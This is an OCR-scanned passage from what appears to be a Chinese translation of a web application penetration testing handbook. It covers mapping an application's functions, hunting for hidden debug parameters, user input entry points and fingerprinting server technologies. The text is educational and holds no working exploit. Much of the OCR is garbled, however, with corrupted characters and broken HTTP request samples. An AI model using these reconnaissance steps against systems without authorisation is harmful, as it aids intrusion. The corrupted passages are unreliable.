HTML 文 件 并 将 其 复制 到 Web 服 务 占 上 的 相应 目录 即 可 。 当 用 户 蛙 击 超 
链接 时 ， 他 们 浏览 由 公布 者 创建 的 文件 ， 通 过 服务 器 上 目录 树 中 的 文件 
名 请 求 每 个 文件 。 

虽然 Web 应 用 程序 的 急速 演变 从 根本 上 改变 了 用 户 与 Web 交 互 的 体 
验 ， 但 上 述 动机 仍然 适用 于 绝 大 多 数 的 Web 应 用 程序 内 容 和 功能 。 各 种 
功能 一 般 通 过 不 同 的 URL 访 问 ， 后 者 通常 是 执行 该 项 功能 的 服务 器 端 脚 








本 的 名 称 。 请 求 参 数 ( 位 于 URL 查 询 字 符 串 或 POST 请 求 主体 中 ) 并 不 
告知 应 用 程序 执行 何 种 功能 ， 而 是 告知 应 用 程序 在 执行 功能 时 使 用 哪些 
信息 。 有 鉴于 此 ， 建 立 基 于 URL 的 解析 方法 可 对 应 用 程序 的 功能 进行 有 
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在 使 用 REST 风 格 的 URE 的 应 用 程序 中 ，UREL 文 件 路 径 的 某 些 部 分 
包含 实际 上 用 做 参数 值 的 字符 串 。 在 这 种 情况 下 ， 通 过 解析 URL， 扑 虫 
能 够 解析 应 用 程序 功能 和 这 些 功能 的 已 知 参 数值 列表 。 

但 是 ， 在 某 些 应 用 程序 中 ， 基 于 应 用 程序 “页 面 2 的 动机 并 不 适用 。 
尽管 从 理论 上 说 ， 我 们 可 以 将 任何 应 用 程序 结构 强制 插入 这 种 形式 的 表 
述 中 。 但 是 ， 在 许多 情况 下 ， 另 外 一 种 基于 功能 路 径 的 动机 可 以 更 加 有 
效 地 分 类 其 内 容 与 功能 。 以 仅 使 用 以 下 请 求 访问 的 应 用 程序 为 例 : 


POS’ 











/bank.jsp KETTP/1.1 


I 
ost: wanh-bank.com 
上 : »6 


3910852eamount=291.23&Submit=0k 


这 里 的 每 个 请 求 对 应 唯一 一 个 URL。 请 求 参数 指定 Java servlet All Fi 
要 调用 的 方法 ， 告 诉 应 用 程序 执行 何 种 功能 。 其 他 参数 提供 执行 该 项 功 
能 所 需 的 信息 。 在 其 于 应 用 程序 页 面 的 动机 中 ， 应 用 程序 明显 只 有 一 种 
功能 ， 且 基于 URL 的 解析 不 会 解释 它 的 功能 。 但 是 ， 如 果 我 们 根据 功能 
路 径 解 析 应 用 程序 ， 束 能 更 加 清楚 地 了 解 应 用 程序 的 有 用 功能 。 图 4-10 
是 应 用 程序 功能 路 径 图 的 一 部 分 。 
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图 4-10 ”Web 应 用 程序 功能 路 径 图 





即使 在 应 用 基于 应 用 程序 页 面 的 常规 图 不 存在 任何 问题 的 情况 下 ， 
以 这 种 方式 描述 应 用 程序 的 功能 通常 更 加 有 用 。 在 URL 使 用 的 目录 结构 
中 ， 不 同 功能 之 间 的 逻辑 与 依赖 关系 无 法 一 一 对 应 起 来 。 但 是 ， 无 论 是 
对 于 了 解 应 用 程序 的 核心 功能 ， 还 是 制订 可 能 的 攻击 方案 ， 这 些 远 辑 天 
系 对 攻击 者 而 言 都 非常 有 用 。 确 定 这 些 罗 辑 关 系 后， 攻击 者 就 能 够 全 面 
了 解 应 用 程序 开发 人 员 在 执行 功能 时 的 期 竺 和 假设 ， 并 设法 找到 违背 这 
些 假 设 、 在 应 用 程序 中 造成 无 法 预料 的 行为 的 方法 。 

在 使 用 请 求 参数 而 非 URL 确 定 功能 的 应 用 程序 中 ， 这 种 方法 对 于 枚 
举 应 用 程序 的 功能 会 有 所 帮助 。 在 前 面 的 示例 中 ， 使 用 前 面 讨论 的 内 容 
碍 找 技 巧 目前 还 不 可 能 发 现任 何 隐藏 的 内 容 。 那 些 技巧 需要 根据 应 用 程 
序 访问 功能 时 实际 使 用 的 机 制 修改 。 














渗透 测试 步 又 


(1) 确定 所 有 通过 在 参数 中 提交 某 一 功能 的 名 称 
《如 /admin.jsp?action=editUser) 而 非 通过 请 求 代 表 那 个 功能 的 一 个 
特殊 页 面 〈 如 /admin/editUser.jsp) 访问 应 用 程序 功能 的 情况 。 

(2) 修改 上 述 用 于 碍 找 URL 相 关内 容 的 目 动 化 技巧 ， 利 用 它 
处 理应 用 程序 使 用 的 内 容 -访问 机 制 。 例 如 ， 如 果 应 用 程序 使 用 参 
数 指定 servlet 和 方法 名 称 ， 首 先 确 定 它 在 请 求 一 个 无 效 servlet 或 方 
法 以 及 请 求 一 个 有 效 方法 与 其 他 无 效 参数 时 的 行为 。 设 法 确定 表 
示 “ 触 点 ”( 即 有 效 servlet 和 方法 ) 的 服务 器 响应 的 特点 。 如 果 可 
能 ， 想 出 办 法 分 两 个 阶段 攻击 这 个 问题 ， 首 先 枚 举 servlet， 然 后 枚 
举 其 中 的 方法 。 对 用 于 查找 URL 相 关内 容 的 技巧 使 用 相似 的 方法 ， 
列 出 常见 项 目 ， 通 过 从 实际 观察 到 的 名 称 进行 推 亲 ， 增 加 这 些 项 
目 ， 并 根据 项 目 生成 大 量 请 求 。 

(3) 如 果 可 能 ， 根 据 功 能 路 径 绘制 一 幅 应 用 程序 内 容 图 ， 说 
明 所 有 被 枚 举 的 功能 和 逻辑 路 径 以 及 它们 之 间 的 依赖 关系 。 











如 果 应 用 程序 使 用 其 他 参数 以 别 的 方式 控制 其 逻辑 ， 那 么 它 使 用 请 
求 参 数 说 明 应 执行 何 种 功能 的 情况 就 会 出 现 变化 。 例 如 ， 如 果 在 URL 的 
查询 字符 串 中 加 入 debug=true 参 数 ， 应 用 程序 的 运作 方式 就 会 发 生 改 
T: 它 可 能 会 关闭 茶 些 输入 确认 检查 ， 人 允许 用 户 避 开 茶 些 访问 控制 或 者 
在 啊 应 中 显示 详细 的 调试 信息 。 许 多 时 候 ， 我 们 无 法 从 应 用 程序 的 任何 
内 容 直 接 推 新 它 如 何 处 理 这 个 参数 〈 例 如 ， 它 并 不 在 超 链接 的 URL 中 插 
入 debug=false) 。 只 有 通过 猜测 许多 值 ， 才 能 在 提交 正确 的 值 之 后 了 解 
这 个 参数 产生 的 效果 。 


渗透 测试 步 又 


(1) 使 用 常用 调试 参数 名 称 (调试 、 测 试 、 隐 藏 、 来 源 等 ) 
和 常用 值 ( 真 、 是 、 开 通 和 1 等 ) 列表 ， 辐 一 个 已 知 的 应 用 程序 页 
面 和 功能 提出 大 量 请 求 。 重 复 执 行 这 一 操作 ， 直 到 浏览 完 所 有 名 / 
在 POST 请 求 的 URL 人 查询 字符 串 和 消息 主体 中 插入 增加 

可 以 使 用 多 组 有 效 载荷 和 “集束 炸弹 ”(cluster bomb) 攻击 类 型 
《请 参阅 第 14 章 了 解 详细 信息 ) ， 通 过 Burp Intruder 执 行 这 一 测 
TAS 

(2) 监控 收 到 的 全 部 啊 应 ， 确 定 任 何 表 明 增 加 的 参数 给 应 用 
程序 处 理 过 程 造成 影响 的 异常 。 

(3) 根据 可 用 时 间 ， 在 许多 不 同 的 页 面 或 功能 中 查找 隐藏 的 
参数 。 选 择 开 发 人 员 最 有 可 能 在 其 中 执行 调试 逻辑 的 功能 ， 如 登 
录 、 搜 索 、 文 件 上 传 和 下 载 等 。 














4.2 ”分析 应 用 程 


枚 举 尽 可 能 多 的 应 用 程序 内 容 只 是 解析 过 程 的 一 个 方面 。 分 析 应 用 
程序 的 功能 、 行 为 及 使 用 的 技术 ， 确 定 它 暴露 的 关键 受 攻击 面 ， 并 开始 
想 出 办 法 探查 其 中 可 供 利 用 的 漏洞 ， 这 项 任务 也 同样 重要 。 
值得 研究 的 一 些 重要 方面 如 下 。 

口 应 用 程序 的 核心 功能 : 用 于 特定 目的 时 可 利用 它 执 行 的 操作 。 
口 其 他 较为 外 围 的 应 用 程序 行为 ， 包 括 站 外 链接 、 错 误 消 息 、 管 理 
与 日 志 功 能 、 重 定 同 使 用 等 。 

口 核 心安 全 机 制 及 其 运作 方式 ， 特 别 是 会 话 状态 、 访 问 控制 以 及 验 
证 机 制 与 支持 逻辑 (用 户 注 册 、 和 密码 修改 、 账 户 恢 复 等 )。 

口 应 用 程序 处 理 用 户 提 交 的 输入 的 所 有 不 同位 置 BE-SURL. AW 
字符 串 参 数 、POST 数 据 、cookie 以 及 类 似 内 容 。 

口 客户 端 使 用 的 技术 ， 包 括 表 单 、 客 户 病 脚本 、 厚 客户 端 组 件 
(Java applet、ActiveX 控 件 和 Flash) 和 cookie。 

口 服务器 端 使 用 的 技术 ， 包 括 静 态 与 动态 页 面 、 使 用 的 请 求 参 数 类 
全 a Web 服 务 器 软件 、 数 据 库 交互 、 电 子 邮 件 系统 和 其 他 后 
端 组 件 。 

口 任 何 可 收集 到 的 、 关 于 服务 器 问 应 用 程序 内 部 结构 与 功能 的 其 他 
信息 《客户 端 可 见 的 功能 和 行为 的 后 人 台 传 输 机 制 ) o 


4.2.1 确定 用 户 输 入 入 口 点 


在 检查 枚 举 应 用 程序 功能 时 生成 的 HTTP 请 求 的 过 程 中 ， 可 以 确定 
应 用 程序 获取 用 户 输 入 (由 服务 器 处 理 ) 的 绝 大 部 分 位 置 。 需 要 注意 的 
关键 位 置 包括 以 下 几 项 。 
口 每 个 URL 字 符 串 ， 包 括 碍 询 字 符 吕 标记 。 
口 URL 查 询 字 符 串 中 提交 的 每 个 参数 。 
口 POST 请 求 主体 中 提交 的 每 个 参数 。 
口 每 个 cookie。 
口 极 少 情况 下 可 能 包括 由 应 用 程序 处 理 的 其 他 所 有 HTTP 消 息 头 ， 
特别 是 User-Agent、Referer、Accept、Accept-Language 和 Host 消 息 头 。 
1. URL {F15 
通常 ， 查 询 字 符 串 之 前 的 URL 部 分 并 不 被 视 为 是 进入 点 ， 因 为 人 们 




















认为 它们 只 是 服务 器 文件 系统 上 的 目录 和 文件 的 名 称 。 但 是 ， 在 使 用 
REST 风 格 的 URL 的 应 用 程序 中 ， 查 询 字 符 串 之 前 的 URL 部 分 实际 上 可 
以 作为 数据 参数 ， 并 且 和 进入 点 一 样 重要 ， 因 为 用 户 输 入 就 是 查询 字符 


本 身 。 
典型 的 REST 风 格 的 URL 可 以 采用 以 下 格式 : 


http://eis/shop/browse/electronics/iPhone3G/ 
在 这 个 示例 中 ， 字 符 串 electronics 和 iPhone3G 应 被 视 为 存储 搜索 功能 的 
参数 。 

同样 ， 在 下 面 这 个 URL 中 : 


http://eis/updates/2010/12/25/my-new-iphone/ 
updates 之 后 的 每 个 URL 组 件 都 可 以 以 REST 方 式 进 行 处 理 。 

根据 URL 结 构 和 应 用 程序 上 下 文 ， 我 们 可 以 轻松 确定 使 用 REST 风 
格 的 URL 的 应 用 程序 。 但 是 ， 在 解析 应 用 程序 时 ， 并 不 存在 必须 遵循 的 
回 有 标准 ， 因 为 用 户 与 应 用 程序 的 交互 方式 通常 由 应 用 程序 的 开 友 者 决 


2. 请 求 参 数 

多 数 情 况 下 ， 在 URL 查 询 字 符 串 、 消 息 主 体 和 HTTP cookie 中 提交 
的 参数 都 是 明显 的 用 户 输入 进入 点 。 但 是 ， 一 些 应 用 程序 并 不 对 这 些 参 
数 使 用 标准 的 name=value 格 式 ， 而 是 使 用 定制 的 方案 。 定 制 方案 采用 非 
标准 查询 字符 串 标记 和 字段 分 隅 符 ， 甚 至 可 能 在 参数 数据 中 舱 入 其 他 数 
据 方案 (如 XML) 。 

以 下 是 笔者 在 现实 世界 中 遇 到 的 一 些 非 标准 参数 格式 实例 : 

g /dir/file;foo=bar&foo2=bar2; 

Ø /dir/file?foo=bar$foo2=bar2; 

Ø /dir/file/foo%3dbar%26fo02%3dbar?2 ; 

Ø dir/foo.bar/file; 

Ø /dir/foo=bar/file; 

DO /dir/file?param=foo:bar; 

Ø /dir/file? 
data=%3cfoo%3ebar%3c%2ffoo%3e%3cfoo2%3ebar2%3c%2ff002%3e. 

如 果 应 用 程序 使 用 非 标准 的 查询 字符 串 格 式 ， 那 么 在 探查 其 中 是 否 
存在 各 种 常见 的 漏洞 时 必须 考虑 到 这 种 情况 。 例 如 ， 测 试 上 面 最 后 一 个 
URL 时 ， 如 果 忽 略 定 制 格式 ， 认 为 其 仪 包含 一 个 名 为 data 的 参数 ， 因 而 
提交 各 种 攻击 有 效 载荷 作为 这 个 参数 的 值 ， 对 其 进行 简单 处 理 ， 那 么 可 
能 会 遗漏 处 理 查 询 字 符 串 过 程 中 存在 的 许多 漏洞 。 相 反 ， 如 果 详 细 分 析 

















CAEH AY FE i AR USPS A ii GES BI KA XMLA EA, IBY 
就 会 发 现 严 重 人 缺陷， 如 SQL 注 入 或 路 笃 裔 历 。 

3. HTTP 消 息 头 

许多 应 用 程序 执行 定制 的 日 记功 能 ， 并 可 能 会 记录 HTTP 消 息 头 
(如 Referer 和 User-Agent) 的 内 容 。 应 始终 将 这 些 消息 头 视 为 基于 输入 
的 攻击 的 可 能 进入 点 。 

一 些 应 用 程序 还 对 Referer 消 息 头 进行 其 他 处 理 。 例 如 ， 应 用 程序 可 
能 检测 到 用 户 已 通过 搜索 引擎 到 达 ， 并 提供 针对 用 户 的 搜索 查询 的 定制 
响应 。 一 些 应 用 程序 可 能 会 回应 搜索 术语 ， 或 者 尝试 突出 显示 啊 应 中 的 
匹配 表达 式 。 一 些 应 用 程序 则 通过 动态 添加 HTML 关 键 字 等 内 容 ， 并 包 
含 搜索 引擎 中 最 近 的 访问 者 搜索 的 字符 串 ， 以 提高 它们 在 搜索 引擎 中 的 
排名 。 这 时 ， 通 过 提出 大 量 包 含 经 过 适当 设计 的 Referer URL 的 请 求 ， 
就 可 以 不 断 在 应 用 程序 的 啊 应 中 注入 内 容 。 

近年 来 出 现 了 一 个 重要 的 趋势 ， 即 应 用 程序 同 通 过 不 同 设备 (如 笔 
记 本 电脑 、 移 动 电话 、 平 板 电脑 ) 进行 访问 的 用 户 呈 现 不 同 的 内 容 。 应 
用 程序 通过 检 碍 User-Agent 消 息 头 实现 这 一 目的 。 除 了 能 为 直接 在 User- 
Agent 消 息 头 本 身 中 实施 的 基于 输入 的 攻击 提供 “便利 ”外 ， 这 种 行为 还 
可 以 揭示 应 用 程序 中 的 其 他 受 攻 击 面 。 通 过 伪造 流行 移动 设备 的 User- 
Agent 消 息 头 ， 攻 击 者 可 以 访问 其 行为 与 主要 界面 不 同 的 简化 用 户 界 
面 。 由 于 这 种 界面 通过 服务 器 端 应 用 程序 中 的 不 同 代 人 码 路 径 生 成 ， 并 且 
可 能 并 未 经 过 严格 的 安全 测试 ， 因 此 ， 攻 击 者 就 可 以 确定 主要 应 用 程序 
界面 中 并 不 存在 的 漏洞 〈 如 路 站 点 脚本 ) 。 


























Vv fez, Burp Intruder 提 供 了 一 个 内 置 的 有 效 载 荷 列 表 ， 其 中 
包含 大 量 针对 不 同类 型 设备 的 用 户 代 理 字 符 串 。 攻 击 者 可 以 执行 一 
次 简单 的 攻击 ， 即 向 提供 不 同 用 户 代理 字符 串 的 应 用 程序 主页 面 提 
出 一 个 GET 请 求 ， 然 后 检查 Burp Intruder 返 回 的 结果 ， 从 中 确定 表 
明 使 用 了 不 同 用 户 界面 的 反常 现象 。 


除了 针对 浏览 器 默认 发 送 或 应 用 程序 组 件 添加 的 HTTP 请 求 消息 类 
实施 攻击 外 ， 有 些 时 候 ， 攻 击 者 还 可 以 通过 添加 应 用 程序 可 能 会 处 理 的 
其 他 消息 头 来 实施 成 功 的 攻击 。 例 如 ， 许 多 应 用 程序 会 对 客户 的 耳 地 址 
进行 菜 种 处 理 ， 以 执行 日 志 、 访 问 控制 或 用 户 地 理 位 置 定位 等 功能 。 通 
常 ， 应 用 程序 通过 平台 API 可 以 访问 客户 的 网 络 连接 IP 地 址 。 但 是 ， 如 
果 应 用 程序 位 于 负载 均衡 器 或 代理 服务 器 之 后 ， 应 用 程序 可 能 会 使 用 X- 

















Forwarded-For 请 求 消 息 头 《如 果 存 在 ) 中 指定 的 卫 地 址 。 然 后 ， 开 发 者 
可 能 误 认 为 该 IP 地 址 是 安全 的 ， 并 以 危险 的 方式 处 理 该 地 址 。 在 这 种 情 
况 下 ， 通 过 添加 适当 设计 的 X-Forwarded-For 消 息 头 ， 攻 击 者 就 可 以 实施 
SQL 注入 或 持续 的 跨 站 点 脚本 等 攻击 。 

4. 和 市 外 通道 

最 后 一 类 用 户 输入 进入 点 是 带 外 通道 ， 应 用 程序 通过 它 接收 攻击 者 
能 够 控制 的 数据 。 如 果 只 是 检查 应 用 程序 生成 的 HTTP 流 量 ， 攻 击 者 可 
能 根本 无 法 检测 到 其 中 一 些 进 入 点 ， 发 现 它们 往往 需要 全 面 了 解 应 用 程 
通过 带 外 通道 接收 用 户 可 控制 的 数据 的 Web 应 用 
EF : 
下 口 处 理 并 显示 通过 SMTP 接 收 到 的 电子 邮件 消息 的 web 邮件 应 用 程 
aes 


口 具 有 通过 HTTP 从 其 他 服务 器 获取 内 容 功能 的 发 布 应 用 程序 ; 

口 使 用 网 络 噢 探 器 收集 数据 并 通过 Web 应 用 程序 界面 显示 这 些 数据 
的 入 侵 检测 应 用 程序 ; 

口 任 何 提供 由 非 浏览 器 用 户 代 理 使 用 的 API 接 口 “如 果 通 过 此 接口 
— 的 数据 与 主 Web 应 用 程序 共享 ) 的 应 用 程序 ， 如 移动 电话 应 用 程 
To 


4.2.2 ”确定 服务 器 端 


通常 ， 我 们 可 以 通过 各 种 线索 和 指标 确定 服务 器 所 采用 的 技术 。 

1. 提取 版 本 信息 

许多 Web 服 务 器 公开 与 Web 服 务 器 软件 本 身 和 所 安装 组 件 有 关 的 详 
细 版 本 信息 。 例如 ，HTTP Server 消 息 头 揭示 大 量 与 安装 软件 有 关 的 信 




















erver: Apache/1.3.31 (Unix) mod_¢gzip/1.3.26.1a mod_auth_passthrough/ 
1.8 moG log bytes/1.2 mod_bwlimited/1.4 PHP/4.3.9 FrontPage/ 


).2.2634a mod ssl/2.8.20 OpenSSL/0.9.7a 


除 Server 消 轧 头 外 ， 下 列 位 置 也 可 能 揭露 有 关 软 件 类 型 和 版 本 的 信 


口 建立 HTML 页 面 的 模板 ; 

口 定 制 的 HTTP 消 息 头 ; 

口 URL 查 询 字 符 串 参数 。 

2. HTTP 指 纹 识别 

从 理论 上 说 ， 服 务 器 返回 的 任何 信息 都 可 加 以 定制 或 进行 有 意 伪 
，Server 消 息 头 等 内 容 也 不 例外 。 大 多 数 应 用 程序 服务 器 软件 允许 管 
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理 员 配置 在 Server HTTPYH SSK PR H Ti POR Se EE A 
je, (FU. ee BOD EANA AA Web HR 3 rs HI ft 4 
为 确定 其 所 使 用 的 软件 ， 或 者 至 少 缩小 搜索 范围 。HTTP 规 范 中 包含 许 
多 可 选 或 由 执行 者 自行 决定 是 否 使 用 的 内 容 。 男 外 ， 许 多 Web 服 务 器 还 
以 各 种 不 同 的 方式 违背 或 扩展 该 规范 。 因 此 ， 除 通过 Server 消 息 头 判断 
外 ， 还 可 以 使 用 大 量 迁 回 的 方法 来 识别 Web 服 务 器 。 在 图 4-11 中 ， 
Httprecon 工 具 正 对 EIS 应 用 程序 进行 扫描 ， 并 以 不 同 的 可 信和 度 报告 各 种 
可 能 的 web 服务 器 。 


FS httprecon 7.3 - http://ers:80/ | LS) |S 











File Configuration Fingerprinting Reporting Help 
Target (Apache 2 0 54) 
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Matchist [952 Implemertakons] | Fingerprint Details | Report Preview 
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Generate HTML Report... Done 





图 4-11 Httprecon 下 在 识别 EIS 应 用 程序 








3. 文件 扩展 名 
URL 中 使 用 的 文件 扩展 名 往往 能 够 揭示 应 用 程序 执行 相关 功能 所 使 
用 的 平台 或 编程 语言 。 例 如 : 


口 asp— Microsoft Active Server Pages; 








D aspx: Microsoft ASP.NET; 
DQ jsp Java Server Pages; 
D cfm Cold Fusion; 





口 php 一 一 PHP 语 言 ; 
D d2w— WebSphere; 
口 pl Perl 语 言 ; 

口 py 一 一 Python 语 言 ; 











口 dl 一 一 通常 为 编译 型 本 地 代码 CCRC) ; 
口 nsf 或 ntf Lotus Domino。 








即使 应 用 程序 在 它 公 布 的 内 容 中 并 不 使 用 特定 的 文件 扩展 名 ， 但 我 
们 一 般 还 是 能 够 确定 服务 器 是 否 执行 文 持 该 扩展 名 的 技术 。 例 如 ， 如 果 
应 用 程序 上 安装 有 ASP.NET， 请 求 一 个 不 存在 的 .aspx 文 件 将 返回 一 个 由 
ASP.NET 框 架 生 成 的 错误 页 面 ， 如 图 4-12 所 示 。 人 但是， 请求 一 个 扩展 名 
人 
4-13 所 示 。 
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图 4-13 请求 一 个 无 法 识别 的 文件 扩展 名 时 生成 的 第 规 错误 消息 


使 用 前 面 描述 的 上 自动 化 内 容 碍 找 技 巧 ， 我 们 能 够 请 求 大 量 币 见 的 文 
件 扩展 名 ， 并 迅速 确定 服务 器 是 否 执行 了 任何 相关 技术 。 

之 所 以 出 现 上 述 不 同 的 行为 ， 是 因为 许多 Web 服 务 器 将 特殊 的 文件 
扩展 名 映射 到 特定 的 服务 器 端 组 件 中 。 不 同 的 组 件 处 理 错误 的 方式 《〈 包 
括 请 求 不 存在 的 内 容 ) 也 各 不 相同 。 图 4-14 说 明了 默认 安装 IIS 5.0 时 将 
各 种 扩展 名 映射 到 不 同 处 理 程序 DLL 的 情况 。 


Application Configuration = ; xj 
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图 4-14 IIS5.0 中 的 文件 扩展 名 映射 











分 析 请 求 文件 扩展 名 时 生成 的 各 种 错误 消息 可 以 确定 该 文件 扩展 名 
映射 是 否 存 在 。 在 某 些 情况 下 ， 发 现 一 个 特殊 的 映射 可 能 表示 存在 一 个 
Web 服 务 器 漏洞 。 例 如 ， 过 去 ，IS 中 的 .printer 和 .ida/.idq 处 理 程序 易于 
遭受 绥 冲 区 溢出 攻击 。 

类 似 于 下 面 的 URL 是 男 外 一 种 值得 注意 的 常用 识别 方法 : 

https://wahh- A -421206,00.html 
pa ete te 分 隔 的 数字 通常 由 Vignette 内 容 管理 平台 生成 。 

4. H 

















一 些 子 目 录 名 称 常 党 表示 应 用 程序 使 用 了 相关 技术 。 例 如 : 
DQ servlet Java servlet; 
Dpls Oracle Application Server PL/SQL; 
D cfdocs 或 cfide Cold Fusion; 
口 SilverStream SilverStream Web 服 务 器 ; 
口 WebObjects 或 {function}.woa Apple WebObjects; 
Ø rails Ruby on Rails. 
.会 话 令 牌 
许多 Web 服 务 器 和 Web 应 用 程序 平台 默认 生成 的 会 话 令 牌 名 称 也 揭 
示 其 所 使 用 技术 的 信息 ， 例 如 : 
DQ JSESSIONID Java 平 台 ; 
DQ ASPSESSIONID Microsoft IIS 服 务 器 ; 
口 ASP.NET_SessionId Microsoft ASP.NET; 
口 CFID/CFTOKEN Cold Fusion; 
D PHPSESSID —— PHP. 
6. 第 三 方 代码 组 件 
许多 Web 应 用 程序 整合 第 三 方 代码 组 件 执行 常见 的 功能 ， 如 购物 
车 、 登 录 机 制 和 公告 牌 。 这 些 组 件 可 和 E 为 开源 代码 ， 或 者 从 外 部 软件 开 
发 者 购买 而 来 。 如 果 是 这 样 ， 那 么 相同 的 组 件 会 出 现在 因特网 L Ta 
其 他 Web 应 用 程序 中 ， 可 以 根据 这 些 组 件 了 解 应 用 程序 的 功能 。 
其 他 应 用 程序 会 利用 相同 组 件 的 不 同 特性 ， 确保 攻击 者 能 够 确定 目 标 应 
用 程序 的 其 他 隐藏 行为 和 功能 。 而 且 ， 软 件 中 可 能 包含 其 他 地 方 已 经 揭 
示 的 某 些 已 知 漏洞 ， 攻 击 者 也 可 以 下 载 并 安装 该 组 件 ， 对 它 的 源 代 码 进 
行 分 析 或 以 受 控 的 方式 探查 其 中 存在 的 缺陷 。 















































渗透 测试 步 又 


(1) 确定 全 部 用 户 输 入 入 口 点 ， 包 括 URL、 查 询 字 符 串 参 
数 、POST 数 据 、cookie 和 其 他 由 应 用 程序 处 理 的 HTTP 消息 头 。 

(2) 分 析 应 用 程序 使 用 的 查询 字符 串 格 式 。 如 果 应 用 程序 并 
未 使 用 第 3 章 描述 的 标准 格式 ， 设 法 了 解 它 如 何 通 过 URL 提 区 参 
数 。 几 乎 所 有 定制 方案 仍然 使 用 名 / 值 模型 的 某 种 变化 形式 ， 因 此 
要 设法 了 解 名 / 值 对 如 何 被 封装 到 已 经 确定 的 非 标准 URL 中 。 

(3) 确定 任何 向 应 用 程序 处 理 过 程 引入 用 户 可 控制 或 其 他 第 
三 方 数 据 的 带 外 通道 。 

(4) 查看 应 用 程序 返回 的 HTTP 服 务 器 旗 标 。 注 意 ， 在 某 些 情 
况 下 ， 应 用 程序 的 不 同 区 域 由 不 同 的 后 端 组 件 处 理 ， 因 此 可 能 会 收 
到 不 同 的 Server 消 息 头 。 

(5) 检查 所 有 定制 HTTP 消 息 头 或 HTML 源 代码 注释 中 包含 的 
任何 其 他 软件 标识 符 。 

(6) 运行 Httprecon 工 具 识 别 Web 服 务 器 。 

(7) 如 果 获 得 关于 Web 服 务 器 和 其 他 组 件 的 详细 信息 ， 搜 索 
其 使 用 的 软件 版 本 ， 确 定 在 发 动 攻击 时 可 供 利 用 的 所 有 漏洞 〈 请 参 
阅 第 18 章 了 解 相 关内 容 〉。 

(8) 分 析 应 用 程序 URL 列 表 ， 确 定 任何 看 似 重 要 的 文件 扩展 
名 、 目 录 或 其 他 提供 服务 器 使 用 技术 相关 线索 的 内 容 。 
0 

(10) 使 用 常用 技术 列表 或 Google 推 测 服务 器 所 使 用 的 技术 ， 
或 者 查找 其 他 明显 使 用 相同 技术 的 Web 站 点 和 应 用 程序 。 

(11) 在 Google 上 搜索 可 能 属于 第 三 方 软件 组 件 的 任何 不 常见 
的 cookie、 脚 本 、HTTP 消 息 头 名 称 。 如 果 发 现 使 用 相同 组 件 的 应 用 
程序 ， 对 其 进行 分 析 ， 确 定 该 组 件 支持 的 任何 其 他 功能 和 人 参数， 并 
确定 目标 应 用 程序 是 否 具 有 这 些 功能 、 使 用 这 些 参数 。 注 意 ， 由 于 
品牌 定制 ， 相 同 第 三 方 组 件 在 每 个 应 用 程序 中 的 外 观 可 能 和 截然 不 
同 ， 但 其 核心 功能 〈 包 括 脚本 和 参数 名 称 ) 往往 并 无 变化 。 如 有 可 
能 ， 下 载 并 安装 组 件 ， 对 其 进行 分 析 以 充分 了 解 它 的 功能 、 查 找 其 
中 存在 的 所 有 漏洞 。 同 时 ， 查 询 已 知 漏洞 库 ， 确 定 相 关 组 件 中 存在 

















的 所 有 已 知 漏洞 。 


4.2.3 ”确定 服务 器 端 功能 


通过 留意 应 用 程序 同 客 户 端 披露 的 线索 ， 通 常 可 推断 与 服务 器 端 功 

i i 
仔细 分 析 请 求 

以 下 面 用 于 访问 搜索 功能 的 URL 为 例 ， 
https://wahh-app.com/calendar.jsp? 
name=new%20applicants&isExpired=0&startDate=22%2F09%2F2 

可 见 ，.jsp 文 件 扩 展 名 表示 它 使 用 Java Server Pages。 据 此 可 以 推 

Wr: 搜索 功能 从 索引 系统 或 数据 库 获 取信 息 ; OrderBy 参 数 蜡 示 它 使 用 
Ja Sin BUG FE 提交 的 值 将 被 SQL 查询 的 ORDER BY 子 句 使 用 。 和 数据 库 
查询 使 用 的 其 他 参数 一 样 ， 这 个 参数 也 非常 容易 受到 SQL 注 入 攻击 (请 
参阅 第 9 章 了 解 相 关内 容 ) 。 

在 这 些 参 数 中 ， ，isExpired 字 段 同样 值得 我 们 注 间 mo (RHA, Me 

个 指定 搜索 查询 是 人 否 应 包含 已 到 期 内 容 的 布尔 型 标志 。 如 果 应 用 程序 的 
SAGER EAP IE A 将 这 个 参数 和 由 0 误 为 1 就 能 
确定 一 个 访问 控制 漏洞 (请 参阅 第 8 章 了 解 相 关内 容 〉。 

下 面 的 URL 人 允许 用 户 访问 内 容 管理 系统 ， 其 中 包含 男 外 一 些 线索 : 
https://wahh-app.com/workbench.aspx? 
template=NewBranch.tpl&loc=/default&ver=2.31&edit=false 

这 里 的 .aspx 文 件 扩展 名 表示 这 是 一 个 ASP.NET 应 用 程序 。 而 且 ， 很 

可 能 template 参 数 用 于 指定 一 个 文件 名 ，loc 参 数 用 了 于 指定 一 个 目录 。 很 
明显 ， 文 件 扩展 名 .tpl 证 明了 上 述 推 论 ， 而 位 置 /default 很 有 可 能 是 一 个 
日 录 名 称 。 应 用 程序 可 能 获得 指定 的 模板 文件 ， 并 将 其 内 容 包 含 在 啊 应 

中 。 这 些 参数 非常 容易 受到 路 径 壳 历 攻击 ， 人 允许 攻击 者 读 取 服务 器 上 的 
任何 文件 (请 参阅 第 10 章 了 解 相关 内 容 〉。 

同样 值得 注意 的 是 edit 参 数 ， 它 被 设置 为 假 。 将 这 个 值 更 改 为 趴 会 

修改 注册 功能 ， 可 能 允许 攻击 者 编辑 应 用 程序 开发 者 不 布 望 用 户 编辑 的 
数据 。 由 ver 参 数 并 不 能 推断 出 任何 有 用 的 线索 ， 但 修改 这 个 参数 可 能 
会 使 应 用 程序 执行 一 组 可 被 攻击 者 利用 的 不 同 功能 。 

最 后 ， 我 们 来 分 析 以 下 请 求 ， 它 用 于 回应 用 程序 管理 员 提出 问题 : 



























































POST /feedback.php HTTP/1.1 
Host: wahh-app.com 


Content-Length: 389 


from=user@wahh-mail.com&to=helpdesk@wahh-app.com&subject= 
Problem+logging+in&message=Pleasetheip... 








和 其 他 示例 一 样 ，.php 文 件 扩展 名 表示 它 使 用 PHP 语 言 执行 功能 。 
而 且 ， 应 用 程序 极 有 可 能 正 通过 接口 与 一 个 外 部 电子 邮件 系统 连接 ;， 同 
时 ， 它 显示 使 用 电子 邮件 的 相关 字段 回 那个 系统 提交 用 户 可 控制 的 输 
入 。 攻 击 者 可 利用 这 项 功能 加 任何 接收 者 发 送 任意 邮件 ， 并 且 ， 其 中 所 
和 

容 ) 。 














YY 提示 ”在 猜测 请 求 不 同 部 分 的 功能 时 ， 通 常 有 必要 从 整个 
URL 和 应 用 程序 的 角度 进行 考虑 。 同 样 以 Extreme Internet Shopping 
